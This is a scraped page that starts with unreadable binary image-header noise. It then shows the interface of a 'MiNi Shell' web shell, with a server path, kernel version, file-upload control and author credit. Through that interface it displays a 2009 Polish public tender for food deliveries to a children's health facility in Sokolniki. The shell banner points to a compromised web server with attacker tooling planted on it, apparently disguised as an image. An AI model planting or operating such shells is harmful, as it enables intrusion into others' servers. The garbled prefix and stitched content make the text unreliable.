JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090121/23463-N-2009.html

<p class="kh_header"><b>Sokolniki: Zakup wraz z dostawą artykułów spożywczych dla Specjalistycznego Zakładu Opieki Zdrowotnej dla Dzieci z Chorobami Narządu Ruchu, Dróg Oddechowych i Wad Wymowy w Sokolnikach</b><br>
<b>Numer ogłoszenia: 23463 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Zakład Opieki Zdrowotnej dla Dzieci z Chorobami Narządu Ruchu, Dróg Oddechowych i Wad Wymowy w Sokolnikach , ul. Emilii Sczanieckiej 2/12, 95-039 Sokolniki, woj. łódzkie, tel. 042 7101434, faks 042 7101434.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsokolniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą artykułów spożywczych dla Specjalistycznego Zakładu Opieki Zdrowotnej dla Dzieci z Chorobami Narządu Ruchu, Dróg Oddechowych i Wad Wymowy w Sokolnikach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa artykułów spożywczych dla potrzeb działu żywności i żywienia  Specjalistycznego ZOZ dla Dzieci w Sokolnikach, wyszczególnionych w formularzu cenowym w 9 częściach ,dostarczanych środkami transportu Dostawcy i na jego koszt.
część 1. Mleko i jego przetwory, część 2. Mięso i wędliny, część 3. Pieczywo,   
część 4. Warzywa i owoce, część 5. Art. sypkie i przetwory, część 6. Jajka ,
część 7. Ryby mrożone, część 8. Drób, część 9. Mrożonki,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.11.00.00-2, 15.13.11.30-5, 15.81.00.00-6, 03.22.00.00-9, 15.80.00.00-6, 03.14.25.00-3, 15.22.00.00-6, 15.11.21.30-6, 15.33.11.70-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Dostawcy, którzy:
 1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia; 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24  ustawy Prawo zamówień publicznych. 
2. Ocena spełnienia wyżej wymienionych warunków dokonana zostanie zgodnie z formułą (spełnia) - (nie spełnia) w oparciu o informacje zawarte w dokumentach i oświadczeniach.  
3. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż w/w. warunki Dostawca spełnił.
4. Nie złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożenie dokumentów zawierających błędy będzie skutkowało wykluczeniem  Dostawcy z postępowania, z zastrzeżeniem rozdziału X pkt.3 SIWZ.
5. O udzielenie zamówienia mogą ubiegać się  Dostawcy występujący wspólnie.
Dostawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenia zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dostawcy, którzy ubiegają się wspólnie o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania oraz wniesienia zabezpieczenia należytego wykonania umowy.
6. Dostawca nie może bez zgody Zamawiającego przenieść wierzytelności powstałych w wyniku realizacji umowy na osoby trzecie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Zamawiający żąda, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Dostawcę pod rygorem wykluczenia Dostawcy z postępowania i odrzucenia jego oferty, następujących dokumentów:
1) oświadczenia o spełnieniu wymagań udziału w postępowaniu określonych w Rozdziale VII i VIII  SIWZ - załączniki od (1 - 9) SIWZ
2) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej lub zaświadczenia właściwego Urzędu Gminy ,jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (rolniczej), wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3) aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)   Wypełniony i  podpisany  formularz  ofertowy  wg  wzoru  stanowiącego  załączniki od  nr  (1 - 9) SIWZ.
5)  Podpisany i uzupełniony o dane  Dostawcy  wzór umowy na potwierdzenie ,że Dostawca akceptuje wzajemne obowiązki stron wynikające z wyboru oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zozsokolniki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalistyczny Zakład Opieki Zdrowotnej dla Dzieci z Chorobami Narządu Ruchu, Dróg Oddechowych i Wad Wymowy 95 - 039 Sokolniki, ul.Emilii Sczanieckiej 2/12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2009 godzina 09:45, miejsce: Specjalistyczny Zakład Opieki Zdrowotnej dla Dzieci z Chorobami Narządu Ruchu, Dróg Oddechowych i Wad Wymowy 95 - 039 Sokolniki, ul.Emilii Sczanieckiej 2/12 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mleko i jego przetwory.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mleko spożywcze 2% galon	l  11 600    
śmietana 18% pak. 250 ml	l      550
twaróg półtłusty krajanka kg       620
ser topiony 100 g	         szt.     370
ser twardy	         kg	       290
serek homogenizowany 200g	  szt. 130
jogurt owocowy 125g     szt.    2 100
masło ekstra 200g	         kg	      570.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szynka gotowana	      kg	145 
kiełbasa podwawelska   kg	175 
kiełbasa zwyczajna	      kg	10 
kiełbasa  biała 	      kg	10  
kiełbasa  Krakowska    kg	10 
kiełbasa  Zielonogórska kg	160 
kiełbasa  cytrynowa    kg	120 
kiełbasa  szynkowa wieprzowa kg	250 
boczek wędzony	     kg	18 
brzuch surowy	     kg	 5 
wątroba wieprzowa     kg	14 
ozory	                  kg	18  
słonina bez skóry	     kg	10 
żeberka	                  kg	15 
wołowina z kością (antrykot) kg     100 
wołowina bez kości gat. I	 kg     225 
wołowina drobna gat. II	 kg     105 
schab z kością	              kg     310 
łopatka bez kości  gat. I	 kg     450 
wieprzowina drobna  gat. II	 kg     150 
kości (schabowe, karczek)	 kg     150.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.00.00-2, 15.13.11.30-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb zwykły	     kg	       2 450    
chleb razowy    	     kg	          430    
angielka   400g	     szt.	       1 750    
bułki poznańskie 100g  szt.	          420    
rogale 100g  	     szt.	          150   
pączki  	                  szt.	          280
bułki jagodzianki	     szt.	          360
bułka tarta - pacz. po 500g	kg       110
drożdże - pacz. po 500 g	kg         22
bułki maślane - 100 g	szt.     220
bułka z nadzieniem	             szt.   1170.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ziemniaki	                          kg	  7 400     
cebula	                          kg	     160     
*  cebula ze szczypiorkiem	pęcz.	           40    
marchew	                          kg	     980     
pietruszka	             kg	     410     
*  pietruszka z nacią	pęcz. 	           30    
seler	                          kg	     400     
*  seler z nacią	             pęcz.	           30    
buraki	                          kg	     600    
*  botwina	             pęcz.	       40     
pory	                          kg	     210     
kapusta biała	             kg	     380     
*  kapusta biała młoda	szt	           40    
kapusta czerwona	             kg	     150     
kapusta pekińska	             kg	     140     
*  kalafior świeży	            szt	          280    
*  kalarepa	            szt	          100    
* sałata	                         szt	          430    
* ogórki zielone	             kg	      150     
pomidory	                          kg	      380    
*  fasolka szparagowa	kg	      110    
pieczarki	                          kg	        70     
natka pietruszki	          pęcz.	           420    
koper	                       pęcz. 	           480    
szczypiorek	          pęcz. 	           420    
rzodkiewka	          pęcz.	           450    
kapusta kwaszona	             kg	       300     
ogórki kwaszone	             kg	       410    
jabłka	                          kg	     1 010     
pomarańcze	             kg	         40    
mandarynka	             kg	        200    
banany	                          kg	        670     
cytryna	                          kg	        100    
*  arbuz	                          kg	        320    
*  brzoskwinie	             kg	          20     
*  nektarynki	             kg	         100     
*  wiśnie	                          kg	          80    
*  gruszki	             kg	          20     
*  śliwki	                          kg	          60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły sypkie i przetwory.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> olej  Kujawski  op.1000 ml   l	            160
margaryna  Kasia  250     kg	     50                                                                 herb. Pettit 100 g	        Szt.	300
herb. Pieguski 146 g       Szt.	100
herb. Maślane 180 g       Szt.	170
Markizy - 157 g	        Szt.	170
Delicje 136 g	        Szt.	120
wafle Grześki 39 g	        Szt.	140
paluszki Beskid 350g       Szt.	30
suchary 290 g	        Szt.	20
lizaki	                     Szt.	460
wyr. czekoladowe  /Mikołaj,  zając/ 40 g	Szt.	120
cukier op. 1000 g	          kg	1350                                                cukier puder op.400 g       kg	20                                                   cukier waniliowy 32 g      Szt.	250
 miód naturalny 370 g     Szt. 	12    
dżem truskawkowy 330 g Szt.	380
dżem wiśniowy 330 g      Szt.	250
nutella - 220 g	        Szt.	230
herbata Consumer  100g   kg	30                                                  kawa  Inka  150 g	          kg	28,                                                  kakao naturalne 20 g	kg	10 
majonez 265 g	        Szt.	130
musztarda 190 g	        Szt.	140
ketchup łagodny 500 g   Szt.	300
chrzan konserwowy 290 g	Szt.	40
ogórki konserwowe 900 g	Szt.	88
koncentrat pomidorowy 190 g Szt.	380
groszek konserwowy 320 ml	  Szt.	190
kukurydza konserwowa 400 g  Szt.	40
szczaw konserwowy 320 ml	  Szt.	80
przecier ogórkowy 320 ml	  Szt.	100
barszcz biały  42 g Winiary	  Szt.	650
zupa grochowa 73 g	  Szt.	80
zupa pieczarkowa 45 g 	  Szt.	500
bulion drobiowy - kostka Winiary  60 g  Szt.	110
bulion grzybowy - kostka Winiary  60 g Szt.	110
przyprawa do zup -  1000 ml    	 Szt.	15
Vegeta  200 g	        Szt.	60
przyprawa do grilla 20 g  Szt.	15
ól kamienna jodowana op. 1000 g  kg	 210                                                pieprz naturalny 20 g     Szt.	290
pieprz ziołowy 20 g        Szt.	240
natka pietruszki - susz  10 g	 Szt.	30
Majeranek  20 g	        Szt.	60
liść laurowy 7 g	        Szt.	30
Żelatyna 50 g 	        Szt.	20
kwasek cytrynowy 20 g  Szt.	120
Cynamon  20 g	        Szt.	80
soda oczyszczona 100 g Szt.	20
proszek do pieczenia 60 g	Szt.	30
Rodzynki  200 g	           kg	4 
aromaty do ciast (dzbanuszki)  Szt.	230
sok malinowy 500 ml	   Szt.	80
sok pomarańczowy - 1000 ml  Szt.	60
sok  Owoce spiżarni  425 ml	  Szt.	160
sok owocowy  200 ml	  Szt.	660
Kisiel  58 g	               Szt.	970
budyń 65 g	               Szt.	620
galaretka owocowa 79 g	Szt.	650
mąka pszenna  szadkowska  op.1000 g kg	640                                       mąka ziemniaczana op.1000 g	 kg	20 
makaron Teściowej /nitki, świderki, wstążki/ op.500 g	kg	480             kasza manna op.1000 g	kg	30                                                    kasza jęczmienna op.1000 g	kg	190                                                  kasza gryczana op.500 g	kg	80                                                      ryż op.1000 g	             kg	160 
płatki owsiane op.250 g	kg	20                                                    płatki Nesquik /kuleczki/ op.250 g kg	65                                                    płatki kukurydziane  op.250 g      kg	45                                                    płatki ryżowe 250 g	kg	25                                                     groch łuskany op.500 g	kg	75                                                 pasztet z drobiu 250 g	Szt.	400.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja klasa M	szt.	  13 500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ryby mrożone.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> miruna mrożona - filety	kg	270.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kurczaki  gat.I	kg	          220    
porcje rosołowe	kg	            50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.21.30-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mieszanka kompotowa	kg	360
wiśnie mrożone	             kg	110
truskawki mrożone	             kg	130
kalafior mrożony	             kg	35
fasolka szparagowa	kg	35
mieszanka warzywna	kg	35.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.70-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com